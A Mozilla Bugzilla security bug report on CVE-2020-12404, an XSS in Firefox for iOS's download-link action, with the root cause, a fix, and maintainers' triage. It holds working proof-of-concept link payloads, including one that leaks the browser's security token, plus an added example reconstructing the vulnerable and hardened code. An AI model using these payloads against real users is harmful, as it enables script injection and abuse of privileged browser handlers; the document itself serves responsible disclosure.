Closed Bug 1631739 (CVE-2020-12404) Opened 9 months ago Closed 9 months ago

XSS from booby-trapped link on Firefox iOS Download Link Action

Categories

(Firefox for iOS :: General, defect, P1)

defect

Tracking


RESOLVED FIXED
Tracking Status
fxios 26 ---

People

(Reporter: vinothsparrow, Assigned: garvan)

Details

(Keywords: csectype-sop, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high])

Attachments

(2 files)

Attached file firefox-ios.html

Firefox Version: v24.1
OS: iOS 13.3.1

Issue: Universal XSS on Firefox iOS Download link Action

Description:

When a Firefox iOS user clicks the download link in the hyperlink options, XSS is triggered on the current URL if the hyperlink is in the format https://anydomain/','123');alert(document.domain);//

Sample attack scenario

Steps to reproduce:

  1. Open https://vinothkumar.tech/firefox-ios in your iOS Firefox browser.
  2. Hold the link until preview popup appears.
  3. Click Download Link
  4. XSS is triggered

Root Cause:
https://github.com/mozilla-mobile/firefox-ios/blob/v24.1/Client/Frontend/Browser/BrowserViewController/BrowserViewController+WebViewDelegates.swift#L171

The unescaped URL is being appended to the JavaScript when the download action is clicked

currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")

Fix:

let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(safeUrl)', '\(UserScriptManager.securityToken)')")

Youtube Unlisted Video: https://youtu.be/zkVVolyCrt0

POC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
</head>
<body>
<a href="http://vinothsparrow.herokuapp.com/','123');alert(document.domain);//">Download Link in Firefox</a><br><br>
</body>
</html>

Flags: sec-bounty?

Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.

Group: firefox-core-security → mobile-core-security
Type: task → defect
Component: Security → General
Flags: needinfo?(gkeeley)
Product: Firefox → Firefox for iOS
Flags: needinfo?(gkeeley)

Also with this issue attacker can get security token value in the XSS. Using security token attacker can trigger webkit.messageHandlers events(loginsManagerMessageHandler, printHandler, sessionRestoreHelper, .. etc)

Payload to get security token:

<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>

The above payload will alert the security token.

Assignee: nobody → gkeeley
Priority: -- → P1
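The root cause described in comment #0 (string interpolation of the URL into the evaluateJavaScript call) and the token leak described above are both a matter of how the bridge call is assembled. The following is an added example, not code from the Firefox iOS project: it rebuilds the vulnerable construction and a hardened one in JavaScript, runs each generated snippet against a stub page, and records what actually executes. The token, host names and `document.domain` value are constructed placeholders, and the example works on the raw link string without going through iOS URL parsing.

```javascript
// Added example (not from the Firefox iOS code base). TOKEN is a placeholder
// standing in for UserScriptManager.securityToken.
const TOKEN = "placeholder-security-token";

// Vulnerable: mirrors the Swift string interpolation quoted in the report.
// A single quote in the URL terminates the JS string literal early.
function buildDownloadCallVulnerable(url) {
  return `window.__firefox__.download('${url}', '${TOKEN}')`;
}

// Hardened: emit the URL as a JSON string literal. JSON.stringify escapes
// quotes, backslashes and control characters, so whatever the link contains
// is delivered to download() as one string argument and never parsed as code.
function buildDownloadCallSafe(url) {
  return `window.__firefox__.download(${JSON.stringify(url)}, ${JSON.stringify(TOKEN)})`;
}

// Execute a generated snippet against a stub window/document and log every
// bridge call and alert, so a test can see whether injected code ran.
function runSnippet(snippet) {
  const log = { downloads: [], alerts: [] };
  const fakeWindow = {
    __firefox__: { download: (u, t) => log.downloads.push([u, t]) },
    alert: (msg) => log.alerts.push(String(msg)),
  };
  const fakeDocument = { domain: "victim.example" }; // constructed value
  new Function("window", "alert", "document", snippet)(
    fakeWindow, fakeWindow.alert, fakeDocument);
  return log;
}

// Link shapes from the report, with the attacker host replaced by example.com.
// The first pops an alert on the page; the second defines a function that
// receives the token as its second argument and alerts it (the token leak).
const TRAPPED_URL = "https://example.com/','123');alert(document.domain);//";
const TOKEN_LEAK_URL =
  "https://example.com/','123');var a=function(x,y){alert(y)};a('1";

function demo() {
  return {
    vulnerable: runSnippet(buildDownloadCallVulnerable(TRAPPED_URL)),
    leak: runSnippet(buildDownloadCallVulnerable(TOKEN_LEAK_URL)),
    safe: runSnippet(buildDownloadCallSafe(TRAPPED_URL)),
  };
}
```

In the vulnerable runs the stub receives a truncated URL and the alert fires (with the token in the leak case); in the hardened run download() receives the entire booby-trapped string as its first argument and nothing else executes.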

landed for v25 of Firefox iOS, the next release

Status: UNCONFIRMED → RESOLVED
Closed: 9 months ago
Resolution: --- → FIXED
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]

It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especially social ones) and a context where the victim will want to download the link rather than click on it to open.

Summary: Universal XSS on Firefox iOS Download Link Action → XSS from booby-trapped link on Firefox iOS Download Link Action
Group: mobile-core-security → core-security-release

CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug https://bugzilla.mozilla.org/show_bug.cgi?id=1632387 is the same type of attack, leaking the token, and did have a sec advisory for v25.

tracking-fxios: --- → 26
Attached file advisory.txt

Can you add a CVE to this bug? Thanks

$ ./ios_advisories.py 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....

Flags: needinfo?(dveditz)

Use CVE-2020-12404 for this one.

Alias: CVE-2020-12404
Flags: needinfo?(dveditz)
Group: core-security-release